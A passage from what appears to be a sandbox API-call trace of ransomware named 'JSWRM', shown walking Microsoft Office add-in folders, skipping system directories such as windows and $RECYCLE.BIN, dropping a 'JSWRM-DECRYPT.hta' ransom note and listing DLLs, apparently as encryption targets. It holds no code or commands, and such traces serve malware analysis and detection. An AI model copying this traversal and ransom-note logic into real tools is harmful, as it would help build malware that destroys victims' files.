lstrcmpiW (lpString1="hi", lpString2="windows") returned -1 [0123.136] lstrcmpiW (lpString1="hi", lpString2="recovery") returned -1 [0123.137] lstrcmpiW (lpString1="hi", lpString2="perflogs") returned -1 [0123.137] lstrcmpiW (lpString1="hi", lpString2="documents and settings") returned 1 [0123.137] lstrcmpiW (lpString1="hi", lpString2="$RECYCLE.BIN") returned 1 [0123.137] lstrcmpiW (lpString1="hi", lpString2="system volume information") returned -1 [0123.137] lstrcmpiW (lpString1="hi", lpString2="msocache") returned -1 [0123.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.137] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hi\\jswrm-decrypt.hta")) returned 0xffffffff [0123.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.139] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.139] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.140] CloseHandle (hObject=0x338) returned 1 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\hi\\jswrm-decrypt.hta")) returned 0x20 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.141] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hi\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400dbdaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0123.141] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.141] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400dbdaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.141] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.141] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.141] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x400dbdaf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x400dbdaf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40101f23, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.141] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0123.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0123.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.142] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf43e3cb7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4409f1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0123.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0123.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.142] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c93006, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.142] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.143] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x46aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.143] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.144] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4995f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.144] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0123.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0123.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 